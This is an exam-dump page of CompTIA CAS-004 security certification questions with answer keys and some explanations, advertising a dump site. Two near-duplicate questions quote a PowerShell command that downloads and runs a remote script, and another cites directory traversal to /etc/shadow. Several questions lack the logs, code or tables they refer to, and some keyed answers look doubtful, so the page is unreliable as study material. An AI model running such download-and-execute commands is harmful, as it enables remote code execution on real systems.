Sample Questions of CAS-004 Dumps With 100% Exam Passing Guarantee
Pass Key features of CAS-004 Course with Updated 445 Questions
NEW QUESTION # 39
An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:
mbedTLS: ca certificate undefined
Which of the following is the root cause of this issue?
- A. OpenSSL is not configured to support PKCS#12 certificate files.
- B. The iOS keychain imported only the client public and private keys.
- C. The VPN client configuration is missing the CA private key.
- D. iOS devices have an empty root certificate chain by default.
Answer: B
Explanation:
The root cause of this issue is that the iOS keychain imported only the client public and private keys, but not the CA certificate. A PKCS#12 file (.p12 or .pfx) is a file format that contains a certificate and its private key, optionally protected by a password. A PKCS#12 file can also contain intermediate certificates or root certificates that are needed to verify the certificate chain. However, when importing a PKCS#12 file into the iOS keychain, only the certificate and its private key are imported, not the CA certificate. This means that the iOS device cannot verify the authenticity of the certificate, and displays the error message "mbedTLS: ca certificate undefined". To fix this issue, the CA certificate needs to be imported separately into the iOS keychain, either manually or using a configuration profile. Verified References:
https://developer.apple.com/documentation/devicemanagement/certificatepkcs12
https://support.apple.com/guide/deployment/distribute-certificates-depcdc9a6a3f/web
https://openvpn.net/faq/how-do-i-use-a-client-certificate-and-private-key-from-the-ios-keychain/
NEW QUESTION # 40
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell "IEX(New-Object Net.WebClient).DownloadString
('https://content.comptia.org/casp/whois.psl');whois"
Which of the following security controls would have alerted and prevented the next phase of the attack?
- A. Antivirus and UEBA
- B. Reverse proxy and sandbox
- C. Forward proxy and MFA
- D. EDR and application approved list
Answer: D
Explanation:
An EDR and whitelist should protect from this attack.
NEW QUESTION # 41
A security review of the architecture for an application migration was recently completed. The following observations were made:
* External inbound access is blocked.
* A large amount of storage is available.
* Memory and CPU usage are low.
* The load balancer has only a single server assigned.
* Multiple APIs are integrated.
Which of the following needs to be addressed?
- A. Scalability
- B. Automation
- C. Availability
- D. Performance
Answer: A
Explanation:
The observation that the load balancer has only a single server assigned suggests an issue with scalability. Scalability refers to the ability of the system to handle increasing loads by adding resources. In this case, having a single server assigned to a load balancer may not be adequate to handle increased traffic or load, which could lead to performance issues.
NEW QUESTION # 42
A company is moving all of its web applications to an SSO configuration using SAML. Some employees report that when signing in to an application, they get an error message on the login screen after entering their username and password, and are denied access. When they access another system that has been converted to the new SSO authentication model, they are able to authenticate successfully without being prompted for login.
Which of the following is MOST likely the issue?
- A. A threat actor is implementing an MITM attack to harvest credentials.
- B. The employees are using an old link that does not use the new SAML authentication.
- C. The web services methods and properties are missing the required WSDL to complete the request after displaying the login page.
- D. The XACML for the problematic application is not in the proper format or may be using an older schema.
Answer: B
NEW QUESTION # 43
An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk?
- A. Side-load attack
- B. SDLC attack
- C. Remote code signing
- D. Supply chain attack
Answer: D
Explanation:
In reference to the overarching concept of supply chain, it is important to consider the dependency of third parties on third parties and that frameworks and libraries themselves may also have third-party dependencies. These items essentially become fourth-party (or fifth, sixth-party, etc.) elements and have the potential of presenting vulnerabilities in the final product.
Additionally, it is important to maintain careful control and integrity checking of existing source code. For the source code that remains openly accessible for review and inspection, being able to confidently and quickly identify any changes that have been made to it is critically important.
While many changes are to be expected with source code, it is still imperative to know what changed, by whom, for what reasons, and at what time they occurred in order to discern between authorized and unauthorized or malicious changes.
NEW QUESTION # 44
After a server was compromised an incident responder looks at log files to determine the attack vector that was used The incident responder reviews the web server log files from the time before an unexpected SSH session began:
Which of the following is the most likely vulnerability that was exploited based on the log files?
- A. A SQL injection was used during the ordering process to compromise the database server
- B. Directory traversal revealed the hashed SSH password, which was used to access the server.
- C. The root password was easily guessed and used as a parameter lo open a reverse shell
- D. An outdated third-party PHP plug-in was vulnerable to a known remote code execution
Answer: B
Explanation:
The logs indicate a directory traversal attempt (/../..//.etc/shadow), which is a type of attack that exploits insufficient security validation/sanitization of user-supplied input file names, so that characters representing
"traverse to parent directory" are passed through to the file APIs. The/etc/shadowfile on Unix systems contains password hashes. If an attacker successfully exploited this vulnerability, they could potentially access the hashed SSH password. This information could then be used to gain unauthorized access to the server if the hash was cracked.
NEW QUESTION # 45
The code snippet below controls all electronic door locks to a secure facility in which the doors should only fail open in an emergency. In the code, "criticalValue" indicates if an emergency is underway:
Which of the following is the BEST course of action for a security analyst to recommend to the software developer?
- A. Apply for a life-safety-based risk exception allowing secure doors to fail open
- B. Add additional exception handling logic to the main program to prevent doors from being opened
- C. Rewrite the software's exception handling routine to fail in a secure state
- D. Rewrite the software to implement fine-grained, conditions-based testing
Answer: B
NEW QUESTION # 46
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have alerted and prevented the next phase of the attack?
- A. Antivirus and UEBA
- B. Reverse proxy and sandbox
- C. Forward proxy and MFA
- D. EDR and application approved list
Answer: D
Explanation:
Explanation
An EDR and whitelist should protect from this attack.
NEW QUESTION # 47
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.
Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?
- A. Degaussing
- B. Purging
- C. Drive wiping
- D. Physical destruction
Answer: A
Explanation:
Reference: https://securis.com/data-destruction/degaussing-as-a-service/
NEW QUESTION # 48
A cybersecurity analyst created the following tables to help determine the maximum budget amount the business can justify spending on an improved email filtering system:

Which of the following meets the budget needs of the business?
- A. Filter ABC
- B. Filter GHI
- C. Filter XYZ
- D. Filter TUV
Answer: B
NEW QUESTION # 49
A developer implement the following code snippet.
Which of the following vulnerabilities does the code snippet resolve?
- A. SQL inject
- B. Buffer overflow
- C. Information leakage
- D. Missing session limit
Answer: C
NEW QUESTION # 50
An organization is deploying a new, online digital bank and needs to ensure availability and performance. The cloud-based architecture is deployed using PaaS and SaaS solutions, and it was designed with the following considerations:
- Protection from DoS attacks against its infrastructure and web applications is in place.
- Highly available and distributed DNS is implemented.
- Static content is cached in the CDN.
- A WAF is deployed inline and is in block mode.
- Multiple public clouds are utilized in an active-passive architecture.
With the above controls in place, the bank is experiencing a slowdown on the unauthenticated payments page. Which of the following is the MOST likely cause?
- A. The site is experiencing a brute-force credential attack.
- B. The public cloud provider is applying QoS to the inbound customer traffic.
- C. A DDoS attack is targeted at the CDN.
- D. The API gateway endpoints are being directly targeted.
Answer: A
NEW QUESTION # 51
Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours.
Based on RPO requirements, which of the following recommendations should the management team make?
- A. Leave the current backup schedule intact and make the human resources fileshare read-only.
- B. Leave the current backup schedule intact and pay the ransom to decrypt the data.
- C. Decrease the frequency of backups and pay the ransom to decrypt the data.
- D. Increase the frequency of backups and create SIEM alerts for IOCs.
Answer: D
Explanation:
Increasing the frequency of backups and creating SIEM (security information and event management) alerts for IOCs (indicators of compromise) are the best recommendations that the management team can make based on RPO (recovery point objective) requirements. RPO is a metric that defines the maximum acceptable amount of data loss that can occur during a disaster recovery event. Increasing the frequency of backups can reduce the amount of data loss that can occur, as it can create more recent copies or snapshots of the data.
Creating SIEM alerts for IOCs can help detect and respond to ransomware attacks, as it can collect, correlate, and analyze security events and data from various sources and generate alerts based on predefined rules or thresholds. Leaving the current backup schedule intact and paying the ransom to decrypt the data are not good recommendations, as they could result in more data loss than the RPO allows, as well as encourage more ransomware attacks or expose the company to legal or ethical issues. Leaving the current backup schedule intact and making the human resources fileshare read-only are not good recommendations, as they could result in more data loss than the RPO allows, as well as affect the normal operations or functionality of the fileshare.
Decreasing the frequency of backups and paying the ransom to decrypt the data are not good recommendations, as they could result in more data loss than the RPO allows, as well as increase the risk of losing data due to less frequent backups or unreliable decryption. Verified References:
https://www.comptia.org/blog/what-is-rpohttps://partners.comptia.org/docs/default-source/resources/casp-conten
NEW QUESTION # 52
A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs. the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured:
Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?
A) Personal health information: Inform the human resources department of the breach and review the DLP logs.
) Account history; Inform the relationship managers of the breach and create new accounts for the affected users.
C) Customer IDs: Inform the customer service department of the breach and work to change the account numbers.
D) PAN: Inform the legal department of the breach and look for this data in dark web monitoring.
- A. Option C
- B. Option B
- C. Option A
- D. Option D
Answer: D
NEW QUESTION # 53
An organization is planning for disaster recovery and continuity of operations.
INSTRUCTIONS
Review the following scenarios and instructions. Match each relevant finding to the affected host.
After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.
Each finding may be used more than once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 54
A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:
As part of the image process, which of the following is the FIRST step the analyst should take?
- A. Compare the 'Return-Path" and "Received" fields.
- B. Block the email address carl b@comptia1 com, as it is sending spam to subject matter experts
- C. Ignore the emails, as SPF validation is successful, and it is a false positive
- D. Validate the final "Received" header against the DNS entry of the domain.
Answer: A
NEW QUESTION # 55
Several recent ransomware outbreaks at a company have cost a significant amount of lost revenue.
The security team needs to find a technical control mechanism that will meet the following requirements and aid in preventing these outbreaks:
- Stop malicious software that does not match a signature
- Report on instances of suspicious behavior
- Protect from previously unknown threats
- Augment existing security capabilities
Which of the following tools would BEST meet these requirements?
- A. EDR
- B. Patch management
- C. Host-based firewall
- D. HIPS
Answer: D
NEW QUESTION # 56
......
CAS-004 Sample Practice Exam Questions 2024 Updated Verified: https://www.suretorrent.com/CAS-004-exam-guide-torrent.html
Exam Study Guide Free Practice Test LAST UPDATED : https://drive.google.com/open?id=1qQfopl2eEi2rsplvF6YNjzMfcctvLvR-